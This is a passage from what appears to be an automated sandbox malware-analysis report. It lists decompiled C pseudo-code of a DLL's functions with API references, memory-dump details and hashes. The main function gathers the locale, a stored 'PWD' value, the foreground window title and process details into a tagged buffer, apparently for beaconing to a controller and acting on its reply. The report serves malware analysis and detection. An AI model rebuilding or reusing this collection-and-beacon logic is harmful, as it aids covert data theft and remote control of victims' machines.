                                                                                                                        					if(_t7 != 0) {
                                                                                                                        						_t2 = _t7 + 0x20; // 0x20
                                                                                                                        						_t8 = _t2;
                                                                                                                        						 *((intOrPtr*)(_t7 + 4)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t7 + 8)) = 0;
                                                                                                                        						_t11 = _t8 - _t7;
                                                                                                                        						do {
                                                                                                                        							 *_t8 =  *((intOrPtr*)(_t7 + 4));
                                                                                                                        							 *((intOrPtr*)(_t7 + 4)) = _t8;
                                                                                                                        							_t11 = _t11 + 0x20;
                                                                                                                        							_t8 = _t8 + 0x20;
                                                                                                                        						} while (_t11 <= 0xfe0);
                                                                                                                        						_t9 =  *0x6f34095c; // 0x0
                                                                                                                        						 *_t7 = _t9;
                                                                                                                        						 *0x6f34095c = _t7;
                                                                                                                        						return _t7;
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					while( *((intOrPtr*)(_t7 + 4)) == 0) {
                                                                                                                        						_t7 =  *_t7;
                                                                                                                        						if(_t7 != 0) {
                                                                                                                        							continue;
                                                                                                                        						} else {
                                                                                                                        							goto L4;
                                                                                                                        						}
                                                                                                                        						goto L8;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				L8:
                                                                                                                        				return _t7;
                                                                                                                        			}








                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000040,?,6F33A605,6F33B5E8,?,?,00000001,?,?,?,?,?,6F331FE4), ref: 6F33A5B8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: 4f85f58eaa47dc8818016362bc7f2c2614a78302f728362754fe28a4d3d3eaaf
                                                                                                                        • Instruction ID: 72dd918ccd6ede2807c16e126ef80c7819221652ca170d7c072f4386f8058921
                                                                                                                        • Opcode Fuzzy Hash: 4f85f58eaa47dc8818016362bc7f2c2614a78302f728362754fe28a4d3d3eaaf
                                                                                                                        • Instruction Fuzzy Hash: C1F0C2B6F06170CFEF12CF54D944A487BE5BB1AB10B11C05AE444DF264C770E881CB84
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33A550() {
                                                                                                                        				void* _t1;
                                                                                                                        				void* _t7;
                                                                                                                        
                                                                                                                        				_t1 =  *0x6f34095c; // 0x0
                                                                                                                        				 *0x6f34095c = 0;
                                                                                                                        				if(_t1 != 0) {
                                                                                                                        					do {
                                                                                                                        						_t7 =  *_t1;
                                                                                                                        						VirtualFree(_t1, 0, 0x8000); // executed
                                                                                                                        						_t1 = _t7;
                                                                                                                        					} while (_t7 != 0);
                                                                                                                        					return _t1;
                                                                                                                        				}
                                                                                                                        				return _t1;
                                                                                                                        			}






                                                                                                                        APIs
                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,6F33B535), ref: 6F33A57A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1263568516-0
                                                                                                                        • Opcode ID: 255d2b276bfcf8480f72973b36b534bec51f9a582e42728bca9e614b32164821
                                                                                                                        • Instruction ID: 2f79d25b72a4ad082ce7e980b9edb4b00356c9567f76c5dbf2a4012617fe2b02
                                                                                                                        • Opcode Fuzzy Hash: 255d2b276bfcf8480f72973b36b534bec51f9a582e42728bca9e614b32164821
                                                                                                                        • Instruction Fuzzy Hash: BFD01277B415619BFE50965A9D00B4267AC5B93B61F110115B940EB1A0D661EC158AA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33BB9C() {
                                                                                                                        				void* _t1;
                                                                                                                        
                                                                                                                        				_t1 = malloc(0x80); // executed
                                                                                                                        				 *0x6f34096c = _t1;
                                                                                                                        				 *0x6f340968 = _t1;
                                                                                                                        				if(_t1 != 0) {
                                                                                                                        					 *_t1 =  *_t1 & 0x00000000;
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					return _t1 + 1;
                                                                                                                        				}
                                                                                                                        			}





                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: malloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2803490479-0
                                                                                                                        • Opcode ID: 5e10893ca169395ace7940331e720eb5a4847a31a4242a51ef0dd2ff94a06f21
                                                                                                                        • Instruction ID: e6359331db8f602e5497fcd84ee77876ba91257e942673c0af8f0fad1d7cb4bd
                                                                                                                        • Opcode Fuzzy Hash: 5e10893ca169395ace7940331e720eb5a4847a31a4242a51ef0dd2ff94a06f21
                                                                                                                        • Instruction Fuzzy Hash: CDC012F2722A01CAEB809B29880431936E8FB46332F1094AAE800C90A8EF308054CB00
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Non-executed Functions

                                                                                                                        C-Code - Quality: 82%
                                                                                                                        			E6F336D50(intOrPtr _a8, char _a49, char _a50) {
                                                                                                                        				intOrPtr _v0;
                                                                                                                        				char _v3;
                                                                                                                        				short _v572;
                                                                                                                        				short _v580;
                                                                                                                        				short _v1092;
                                                                                                                        				char _v1364;
                                                                                                                        				char _v1372;
                                                                                                                        				char _v1864;
                                                                                                                        				short _v1872;
                                                                                                                        				short _v1884;
                                                                                                                        				char _v1896;
                                                                                                                        				char _v1900;
                                                                                                                        				struct HWND__* _v1908;
                                                                                                                        				char _v1912;
                                                                                                                        				void* _v1928;
                                                                                                                        				struct HWND__* _v1932;
                                                                                                                        				void* _v1936;
                                                                                                                        				struct tagMSG _v1964;
                                                                                                                        				char _v1972;
                                                                                                                        				struct _FILETIME _v1980;
                                                                                                                        				void* _v1984;
                                                                                                                        				struct HWND__* _v1988;
                                                                                                                        				struct HWND__* _v1992;
                                                                                                                        				struct HWND__* _v1996;
                                                                                                                        				struct HWND__* _v2000;
                                                                                                                        				void _v2004;
                                                                                                                        				void* _v2008;
                                                                                                                        				void* _v2020;
                                                                                                                        				void* _v2024;
                                                                                                                        				void* _v2028;
                                                                                                                        				char _v2032;
                                                                                                                        				void* _v2036;
                                                                                                                        				void* _v2040;
                                                                                                                        				signed short _v2044;
                                                                                                                        				signed int _v2048;
                                                                                                                        				void* _v2052;
                                                                                                                        				char _v2068;
                                                                                                                        				void* _v2072;
                                                                                                                        				char _v2074;
                                                                                                                        				char _v2076;
                                                                                                                        				signed int _v2084;
                                                                                                                        				char _v2088;
                                                                                                                        				long _v2092;
                                                                                                                        				char _v2094;
                                                                                                                        				char _v2096;
                                                                                                                        				intOrPtr _v2100;
                                                                                                                        				struct HWND__* _v2104;
                                                                                                                        				void* _v2120;
                                                                                                                        				int _v2124;
                                                                                                                        				signed int _t251;
                                                                                                                        				signed int _t252;
                                                                                                                        				char _t254;
                                                                                                                        				WCHAR* _t255;
                                                                                                                        				int _t263;
                                                                                                                        				void* _t269;
                                                                                                                        				void* _t270;
                                                                                                                        				WCHAR* _t271;
                                                                                                                        				WCHAR* _t273;
                                                                                                                        				char _t275;
                                                                                                                        				char _t281;
                                                                                                                        				char _t284;
                                                                                                                        				void* _t288;
                                                                                                                        				CHAR* _t293;
                                                                                                                        				int _t294;
                                                                                                                        				char _t295;
                                                                                                                        				signed int _t296;
                                                                                                                        				void* _t299;
                                                                                                                        				signed char _t302;
                                                                                                                        				signed int _t303;
                                                                                                                        				CHAR* _t314;
                                                                                                                        				signed int _t316;
                                                                                                                        				signed int _t317;
                                                                                                                        				void* _t322;
                                                                                                                        				intOrPtr _t324;
                                                                                                                        				void* _t329;
                                                                                                                        				void* _t334;
                                                                                                                        				char _t344;
                                                                                                                        				long _t346;
                                                                                                                        				struct HWND__* _t370;
                                                                                                                        				char _t373;
                                                                                                                        				intOrPtr _t377;
                                                                                                                        				char _t379;
                                                                                                                        				void* _t380;
                                                                                                                        				signed int _t383;
                                                                                                                        				void* _t386;
                                                                                                                        				CHAR* _t395;
                                                                                                                        				struct HWND__* _t406;
                                                                                                                        				struct HWND__* _t407;
                                                                                                                        				signed int _t417;
                                                                                                                        				signed int _t422;
                                                                                                                        				signed short _t423;
                                                                                                                        				signed int _t424;
                                                                                                                        				CHAR* _t442;
                                                                                                                        				CHAR* _t443;
                                                                                                                        				CHAR* _t445;
                                                                                                                        				void* _t467;
                                                                                                                        				void* _t468;
                                                                                                                        				void* _t469;
                                                                                                                        				int _t470;
                                                                                                                        				void* _t471;
                                                                                                                        				struct HWND__* _t472;
                                                                                                                        				void* _t473;
                                                                                                                        				void* _t474;
                                                                                                                        				void _t475;
                                                                                                                        				intOrPtr* _t476;
                                                                                                                        				void* _t477;
                                                                                                                        				CHAR* _t478;
                                                                                                                        				void* _t479;
                                                                                                                        				void* _t481;
                                                                                                                        				void* _t486;
                                                                                                                        				signed short _t487;
                                                                                                                        				void* _t488;
                                                                                                                        				void* _t489;
                                                                                                                        				void* _t490;
                                                                                                                        				CHAR* _t492;
                                                                                                                        				char* _t493;
                                                                                                                        				char* _t494;
                                                                                                                        				void* _t495;
                                                                                                                        				signed int _t496;
                                                                                                                        				void* _t498;
                                                                                                                        				void* _t499;
                                                                                                                        				void* _t500;
                                                                                                                        				void* _t501;
                                                                                                                        				void* _t503;
                                                                                                                        				void* _t504;
                                                                                                                        				void* _t505;
                                                                                                                        				void* _t513;
                                                                                                                        				void* _t514;
                                                                                                                        				void* _t523;
                                                                                                                        				void* _t535;
                                                                                                                        
                                                                                                                        				_t498 = (_t496 & 0xfffffff8) - 0x800;
                                                                                                                        				_push(0x14);
                                                                                                                        				_push( &_v1980);
                                                                                                                        				L6F33C2EE();
                                                                                                                        				_t370 = 0;
                                                                                                                        				_t481 = VirtualAlloc(0, 0x1000, 0x1000, 4);
                                                                                                                        				if(_t481 == 0) {
                                                                                                                        					L91:
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_push(0x14);
                                                                                                                        					_push( &_v1864);
                                                                                                                        					L6F33C2EE();
                                                                                                                        					GetLocaleInfoW(0x400, 0x5a,  &_v1872, 9);
                                                                                                                        					CharLowerW( &_v1872);
                                                                                                                        					_push(0x9c);
                                                                                                                        					_push(0x6f3403a0);
                                                                                                                        					L6F33C2EE();
                                                                                                                        					_push( &_v2036);
                                                                                                                        					_push( &_v2032);
                                                                                                                        					_push( &_v2040);
                                                                                                                        					 *0x6f3403a0 = 0x9c;
                                                                                                                        					_v2040 = 0;
                                                                                                                        					_v2032 = 0;
                                                                                                                        					_v2036 = 0;
                                                                                                                        					L6F33C330();
                                                                                                                        					 *0x6f3403ac = _v2048 & 0x0000ffff;
                                                                                                                        					_t251 = M6F3404A8; // 0x6f240000
                                                                                                                        					 *0x6f3403a4 = _v2052;
                                                                                                                        					 *0x6f3403a8 = _v2044;
                                                                                                                        					 *0x6f34043a = 4;
                                                                                                                        					if(_t251 != 0) {
                                                                                                                        						_push(0x435a88);
                                                                                                                        						_push(1);
                                                                                                                        						_t417 =  &_v2032;
                                                                                                                        						_push(_t417);
                                                                                                                        						_push(_t251);
                                                                                                                        						_v2032 = 0x5e6f0892;
                                                                                                                        						_v2028 = 0;
                                                                                                                        						_v2024 = 0;
                                                                                                                        						_v2020 = 0;
                                                                                                                        						E6F331DB0();
                                                                                                                        						_t251 = _v2020;
                                                                                                                        						_t498 = _t498 + 0x10;
                                                                                                                        						if(_t251 != 0) {
                                                                                                                        							_v2072 = 0;
                                                                                                                        							_t251 =  *_t251(0, 0x65,  &_v2072);
                                                                                                                        							if(_t251 == 0) {
                                                                                                                        								_t251 = _v2084;
                                                                                                                        								if(_t251 != 0) {
                                                                                                                        									_t251 =  *(_t251 + 0x10) & 0x00001000;
                                                                                                                        									 *0x6f34043a = _t417 & 0xffffff00 | _t251 == 0x00001000;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					_push(0x34);
                                                                                                                        					_push(_t481);
                                                                                                                        					L6F33C2EE();
                                                                                                                        					 *((intOrPtr*)(_t481 + 2)) = 0x832eb9b;
                                                                                                                        					 *((short*)(_t481 + 6)) = 0x102;
                                                                                                                        					 *((char*)(_t481 + 8)) = 1;
                                                                                                                        					_t422 = M6F3404E4; // 0x76958bd5
                                                                                                                        					 *((intOrPtr*)(_t481 + 0x18)) = _t422;
                                                                                                                        					_t513 = M6F34050C - _t370; // 0x0
                                                                                                                        					_v2092 = _t370;
                                                                                                                        					_t252 = _t251 & 0xffffff00 | _t513 != 0x00000000;
                                                                                                                        					 *(_t481 + 9) = _t252;
                                                                                                                        					_t377 =  *0x6f3403a4; // 0x0
                                                                                                                        					 *((intOrPtr*)(_t481 + 0x1c)) = _t377;
                                                                                                                        					_t423 =  *0x6f3403a8; // 0x0
                                                                                                                        					 *(_t481 + 0x20) = _t423;
                                                                                                                        					_t514 = M6F3404EC - _t370; // 0x1
                                                                                                                        					 *((char*)(_t481 + 0xa)) = _t252 & 0xffffff00 | _t514 != 0x00000000;
                                                                                                                        					 *((short*)(_t481 + 0x12)) =  *0x6f34043a & 0x000000ff;
                                                                                                                        					_t424 =  *0x6f3403ac; // 0x0
                                                                                                                        					 *(_t481 + 0x24) = _t424;
                                                                                                                        					_t254 = M6F340544; // 0x1
                                                                                                                        					 *((char*)(_t481 + 0xc)) = _t254;
                                                                                                                        					_t379 = M6F340548; // 0x1
                                                                                                                        					 *((char*)(_t481 + 0xb)) = _t379;
                                                                                                                        					 *(_t481 + 0xf) = _t370;
                                                                                                                        					 *((char*)(_t481 + 0x11)) = 0x17;
                                                                                                                        					_t255 = M6F3404F8; // 0x99b7a8
                                                                                                                        					_t467 = E6F33A2F0(_t255, 1,  &_v2092);
                                                                                                                        					_t499 = _t498 + 0xc;
                                                                                                                        					if(_t467 != _t370) {
                                                                                                                        						_t47 = _t481 + 0x34; // 0x34
                                                                                                                        						RtlMoveMemory(_t47, _t467, _v2092);
                                                                                                                        						HeapFree(GetProcessHeap(), _t370, _t467);
                                                                                                                        					}
                                                                                                                        					_t380 = M6F340504; // 0x99ec68
                                                                                                                        					_v2092 = _t370;
                                                                                                                        					_t468 = E6F33A2F0(_t380, 1,  &_v2092);
                                                                                                                        					_t500 = _t499 + 0xc;
                                                                                                                        					if(_t468 != _t370) {
                                                                                                                        						_t53 =  &_a49; // 0x35
                                                                                                                        						RtlMoveMemory(_t481 + _t53, _t468, _v2092);
                                                                                                                        						HeapFree(GetProcessHeap(), _t370, _t468);
                                                                                                                        					}
                                                                                                                        					_t469 = _v2092 +  &_a50;
                                                                                                                        					_v2092 = _t370;
                                                                                                                        					_t486 = E6F33A2F0( &_v1900, 1,  &_v2092);
                                                                                                                        					_t501 = _t500 + 0xc;
                                                                                                                        					if(_t486 != _t370) {
                                                                                                                        						RtlMoveMemory(_t469 + _t481, _t486, _v2092);
                                                                                                                        						HeapFree(GetProcessHeap(), _t370, _t486);
                                                                                                                        					}
                                                                                                                        					_t487 = _t469 + _v2092 + 1;
                                                                                                                        					_v2044 = _t487;
                                                                                                                        					_t470 = SetTimer(_t370, _t370, _t370, _t370);
                                                                                                                        					_v2068 = 0x28;
                                                                                                                        					_v2052 = 1;
                                                                                                                        					_t263 = GetMessageA( &_v1964, _t370, _t370, _t370);
                                                                                                                        					if(_t263 == _t370) {
                                                                                                                        						L90:
                                                                                                                        						VirtualFree(_t481, _t370, 0x8000);
                                                                                                                        						goto L91;
                                                                                                                        					} else {
                                                                                                                        						L15:
                                                                                                                        						if(_v2052 == _t370) {
                                                                                                                        							_t383 = _v1964.message;
                                                                                                                        						} else {
                                                                                                                        							_t383 = 0x113;
                                                                                                                        							_v2052 = _t370;
                                                                                                                        							_v1964.message = 0x113;
                                                                                                                        							_v1964.hwnd = _t370;
                                                                                                                        							_v1964.wParam = _t470;
                                                                                                                        						}
                                                                                                                        						if(_t263 == 0xffffffff || _t383 == 0x10) {
                                                                                                                        							goto L89;
                                                                                                                        						}
                                                                                                                        						if(_t383 == 0x113) {
                                                                                                                        							if(_v1964.hwnd != _t370) {
                                                                                                                        								L87:
                                                                                                                        								DispatchMessageA( &_v1964);
                                                                                                                        								_t263 = GetMessageA( &_v1964, _t370, _t370, _t370);
                                                                                                                        								if(_t263 != _t370) {
                                                                                                                        									_t487 = _v2048;
                                                                                                                        									goto L15;
                                                                                                                        								}
                                                                                                                        								goto L90;
                                                                                                                        							}
                                                                                                                        							L24:
                                                                                                                        							if(_t523 != 0) {
                                                                                                                        								goto L87;
                                                                                                                        							}
                                                                                                                        							KillTimer(_t370, _t470);
                                                                                                                        							E6F336A90( &_v2028, _t370);
                                                                                                                        							_t269 = M6F3404D8; // 0x99b240
                                                                                                                        							_t270 = E6F3338A0(_t269, _t370, _t370, 1);
                                                                                                                        							_push(0x1000 - _t487);
                                                                                                                        							_t471 = _t481 + _t487;
                                                                                                                        							_push(_t471);
                                                                                                                        							 *((char*)(_t481 + 0xe)) = _t383 & 0xffffff00 | _t270 != 0x00000000;
                                                                                                                        							L6F33C2EE();
                                                                                                                        							_t271 = M6F3404F8; // 0x99b7a8
                                                                                                                        							_t386 = M6F340504; // 0x99ec68
                                                                                                                        							_v2104 = _t370;
                                                                                                                        							wsprintfW( &_v580, L"%s\\%s", _t386, _t271);
                                                                                                                        							_t273 = M6F3404D0; // 0x98a4d0
                                                                                                                        							_t503 = _t501 + 0x28;
                                                                                                                        							if(GetPrivateProfileStringW(L"PWD",  &_v572, _t370,  &_v1092, 0x103, _t273) != 0) {
                                                                                                                        								_t495 = E6F33A2F0( &_v1092, 1,  &_v2096);
                                                                                                                        								_t503 = _t503 + 0xc;
                                                                                                                        								if(_t495 != _t370) {
                                                                                                                        									RtlMoveMemory(_t471, _t495, _v2096);
                                                                                                                        									HeapFree(GetProcessHeap(), _t370, _t495);
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							_t275 = _v2096;
                                                                                                                        							_v2092 = _t275 + _v2048 + 1;
                                                                                                                        							 *(_t481 + 0x30) = _t275;
                                                                                                                        							_t472 = GetForegroundWindow();
                                                                                                                        							_v1884 = 0;
                                                                                                                        							if(_t472 != _t370) {
                                                                                                                        								GetWindowTextW(_t472,  &_v1884, 0x104);
                                                                                                                        							}
                                                                                                                        							_v2096 = _t370;
                                                                                                                        							_t488 = E6F33A2F0( &_v1884, 1,  &_v2096);
                                                                                                                        							_t504 = _t503 + 0xc;
                                                                                                                        							if(_t488 != _t370) {
                                                                                                                        								RtlMoveMemory(_t481 + _v2092, _t488, _v2096);
                                                                                                                        								HeapFree(GetProcessHeap(), _t370, _t488);
                                                                                                                        							}
                                                                                                                        							_t489 = _v2092 + _v2096 + 1;
                                                                                                                        							_v1884 = 0;
                                                                                                                        							_v2096 = _t370;
                                                                                                                        							if(_t472 != _t370) {
                                                                                                                        								_v2088 = _t370;
                                                                                                                        								GetWindowThreadProcessId(_t472,  &_v2088);
                                                                                                                        								_t344 = _v2088;
                                                                                                                        								if(_t344 > _t370) {
                                                                                                                        									_v1936 = _t344;
                                                                                                                        									asm("pxor xmm0, xmm0");
                                                                                                                        									_v2092 = _t370;
                                                                                                                        									_v1932 = _t370;
                                                                                                                        									_v1928 = 0x18;
                                                                                                                        									asm("movq [esp+0xd0], xmm0");
                                                                                                                        									asm("movq [esp+0xd8], xmm0");
                                                                                                                        									_v1908 = _t370;
                                                                                                                        									_t346 = NtOpenProcess( &_v2092, 0x410,  &_v1928,  &_v1936);
                                                                                                                        									if(_t346 >= 0) {
                                                                                                                        										_push(0x104);
                                                                                                                        										_push( &_v1896);
                                                                                                                        										_push(_t370);
                                                                                                                        										_push(_v2104);
                                                                                                                        										L6F33C38A();
                                                                                                                        										if(_t346 != 0) {
                                                                                                                        											_t479 = E6F33A2F0( &_v1912, 1,  &_v2124);
                                                                                                                        											_t504 = _t504 + 0xc;
                                                                                                                        											if(_t479 != _t370) {
                                                                                                                        												RtlMoveMemory(_t481 + _t489, _t479, _v2124);
                                                                                                                        												HeapFree(GetProcessHeap(), _t370, _t479);
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        										NtClose(_v2120);
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							_t281 = 0;
                                                                                                                        							_t473 = _v2096 +  &_v3;
                                                                                                                        							_v2092 = _t473;
                                                                                                                        							_v2096 = 0;
                                                                                                                        							_t535 =  *0x6f340398 - _t370; // 0x0
                                                                                                                        							if(_t535 == 0) {
                                                                                                                        								L54:
                                                                                                                        								_t474 = _t473 + _t281 + 1;
                                                                                                                        								_v2068 = 1;
                                                                                                                        								if(_t281 > 1) {
                                                                                                                        									_t406 =  *0x6f340398; // 0x0
                                                                                                                        									_t492 = _t474 + _t481;
                                                                                                                        									_t281 = GetDlgItemTextA(_t406, 0x4e83, _t492, 0xfff - _t474);
                                                                                                                        									_v2096 = _t281;
                                                                                                                        									if(_t281 > _t370 &&  *_t481 == 0x2d) {
                                                                                                                        										_t281 = 0;
                                                                                                                        										_v2096 = 0;
                                                                                                                        										 *_t492 = 0;
                                                                                                                        										 *((char*)(_t474 + _t481 + 1)) = 0;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								_v1992 = _t370;
                                                                                                                        								_v1988 = _t370;
                                                                                                                        								_v2000 = _t370;
                                                                                                                        								_v1996 = _t370;
                                                                                                                        								_t475 = _t474 + _t281 + 1;
                                                                                                                        								_v2072 = _t370;
                                                                                                                        								 *(_t481 + 0x2c) = _t370;
                                                                                                                        								 *(_t481 + 0x28) = _t370;
                                                                                                                        								if(_v1964.message != 0x83fe) {
                                                                                                                        									L61:
                                                                                                                        									 *((char*)(_t481 + 0xd)) = 0;
                                                                                                                        									 *(_t481 + 0x14) = _t370;
                                                                                                                        									goto L62;
                                                                                                                        								} else {
                                                                                                                        									_t334 = _v1964.lParam;
                                                                                                                        									if(_t334 == _t370) {
                                                                                                                        										goto L61;
                                                                                                                        									}
                                                                                                                        									 *((char*)(_t481 + 0xd)) =  *((intOrPtr*)(_t334 + 0x10));
                                                                                                                        									 *(_t481 + 0x14) =  *(_t334 + 4);
                                                                                                                        									_v1992 =  *((intOrPtr*)(_t334 + 0x14));
                                                                                                                        									_v1988 =  *(_t334 + 0x18);
                                                                                                                        									_v2072 = _t334;
                                                                                                                        									 *(_t481 + 0x2c) =  *(_t334 + 0x18);
                                                                                                                        									L62:
                                                                                                                        									_push( &_v2088);
                                                                                                                        									_push( &_v2092);
                                                                                                                        									_v2092 = _t370;
                                                                                                                        									_v2088 = _t370;
                                                                                                                        									_v1980.dwHighDateTime = E6F3366E0();
                                                                                                                        									_t284 = _v2088;
                                                                                                                        									_push(1);
                                                                                                                        									_v1996 = _t284;
                                                                                                                        									_v2000 = _v2092;
                                                                                                                        									 *(_t481 + 0x28) = _t284;
                                                                                                                        									 *_t481 = _t475;
                                                                                                                        									E6F3353F0(_v2024, _v2028, _t481, _t475);
                                                                                                                        									_t287 = _v1992;
                                                                                                                        									_t505 = _t504 + 0x1c;
                                                                                                                        									_v2008 = _t481;
                                                                                                                        									_v2004 = _t475;
                                                                                                                        									if(_v1992 != _t370) {
                                                                                                                        										_push(1);
                                                                                                                        										E6F3353F0(_v2024, _v2028, _t287, _v1988);
                                                                                                                        										_t505 = _t505 + 0x14;
                                                                                                                        									}
                                                                                                                        									_push("k");
                                                                                                                        									_push( &_v2028);
                                                                                                                        									_t288 = E6F335690();
                                                                                                                        									_push(_t370);
                                                                                                                        									_t490 = _t288;
                                                                                                                        									E6F3353F0(_v2024, _v2028, _t481, _t475);
                                                                                                                        									_t501 = _t505 + 0x1c;
                                                                                                                        									if(_v1980.dwHighDateTime != _t370) {
                                                                                                                        										VirtualFree(_v2092, _t370, 0x8000);
                                                                                                                        									}
                                                                                                                        									_v2088 = _t370;
                                                                                                                        									if(_t490 <= _t370) {
                                                                                                                        										L77:
                                                                                                                        										_push(8);
                                                                                                                        										_push( &_v1972);
                                                                                                                        										L6F33C2EE();
                                                                                                                        										GetSystemTimeAsFileTime( &_v1980);
                                                                                                                        										_v2052 = _v1980.dwLowDateTime;
                                                                                                                        										_v2048 = _v1980.dwHighDateTime;
                                                                                                                        										_v2092 = _t370;
                                                                                                                        										RtlTimeToSecondsSince1970( &_v2052,  &_v2092);
                                                                                                                        										_t395 = M6F3404CC; // 0x99d818
                                                                                                                        										_t293 = M6F3404DC; // 0x99b1c8
                                                                                                                        										_v2096 = 0x6467;
                                                                                                                        										_v2094 = 0;
                                                                                                                        										_t294 = GetPrivateProfileIntA(_t293,  &_v2096, _t370, _t395);
                                                                                                                        										if(_t294 != _t370) {
                                                                                                                        											if(_t294 <= _v2100) {
                                                                                                                        												E6F336A90(_t370, _t370);
                                                                                                                        												_t501 = _t501 + 8;
                                                                                                                        											}
                                                                                                                        										} else {
                                                                                                                        											_t302 = _v2028;
                                                                                                                        											_t303 = _t302 & 0x000000ff;
                                                                                                                        											if(_t302 == 0) {
                                                                                                                        												_t303 = 1;
                                                                                                                        											}
                                                                                                                        											wsprintfA( &_v1372, "%lu", _t303 * 0xe10 + _v2100);
                                                                                                                        											_t442 = M6F3404CC; // 0x99d818
                                                                                                                        											_t501 = _t501 + 0xc;
                                                                                                                        											_t443 = M6F3404DC; // 0x99b1c8
                                                                                                                        											WritePrivateProfileStringA(_t443,  &_v2088,  &_v1364, _t442);
                                                                                                                        										}
                                                                                                                        										goto L83;
                                                                                                                        									} else {
                                                                                                                        										if(_t490 >= 0x12) {
                                                                                                                        											_push(_t370);
                                                                                                                        											E6F3353F0(_v2024, _v2028, _v1984, _t490);
                                                                                                                        											_t476 = _v1984;
                                                                                                                        											_t501 = _t501 + 0x14;
                                                                                                                        											if( *_t476 == 0x832eb9b) {
                                                                                                                        												_t314 = M6F3404CC; // 0x99d818
                                                                                                                        												_t445 = M6F3404DC; // 0x99b1c8
                                                                                                                        												_v2088 = 1;
                                                                                                                        												_v2076 = 0x6467;
                                                                                                                        												_v2074 = 0;
                                                                                                                        												WritePrivateProfileStringA(_t445,  &_v2076, _t370, _t314);
                                                                                                                        												_t316 =  *(_t476 + 4) & 0x0000ffff;
                                                                                                                        												 *0x6f340000 = _t316;
                                                                                                                        												if(_t316 < 0xa) {
                                                                                                                        													 *0x6f340000 = 0x3c;
                                                                                                                        												}
                                                                                                                        												_t317 =  *(_t476 + 0xc) & 0x0000ffff;
                                                                                                                        												if(_t317 <= _t370) {
                                                                                                                        													_push(_t370);
                                                                                                                        													_push(_t370);
                                                                                                                        													_push(_t370);
                                                                                                                        													_push(_t370);
                                                                                                                        												} else {
                                                                                                                        													_push( *(_t476 + 0xa) & 0x000000ff);
                                                                                                                        													_t329 = _v1984;
                                                                                                                        													_push( *(_t476 + 0xb) & 0x000000ff);
                                                                                                                        													_push(_t317 + _t329 + 0x13);
                                                                                                                        													_push(_t329 + 0x12);
                                                                                                                        												}
                                                                                                                        												E6F3369C0();
                                                                                                                        												_t501 = _t501 + 0x10;
                                                                                                                        												if( *((intOrPtr*)(_t476 + 0x10)) > _t370) {
                                                                                                                        													_t322 = HeapAlloc(GetProcessHeap(), 8, 0x1c);
                                                                                                                        													_v0 =  *((intOrPtr*)(_t476 + 6));
                                                                                                                        													_t477 = E6F33A360(( *(_t476 + 0xc) & 0x0000ffff) + _v1984 + ( *(_t476 + 0xe) & 0x0000ffff) + 0x14, 1, 0);
                                                                                                                        													_t324 = E6F33A2F0(_t477, 0, 0);
                                                                                                                        													_t501 = _t501 + 0x18;
                                                                                                                        													_a8 = _t324;
                                                                                                                        													HeapFree(GetProcessHeap(), 0, _t477);
                                                                                                                        													CloseHandle(CreateThread(0, 0, E6F335B40, _t322, 0, 0));
                                                                                                                        													Sleep(0x1f4);
                                                                                                                        													_t370 = 0;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        										HeapFree(GetProcessHeap(), _t370, _v1984);
                                                                                                                        										if(_v2088 != _t370) {
                                                                                                                        											L83:
                                                                                                                        											_t295 = _v2088;
                                                                                                                        											if(_t295 != _t370) {
                                                                                                                        												_t299 =  *_t295;
                                                                                                                        												if(_t299 != _t370) {
                                                                                                                        													SetEvent(_t299);
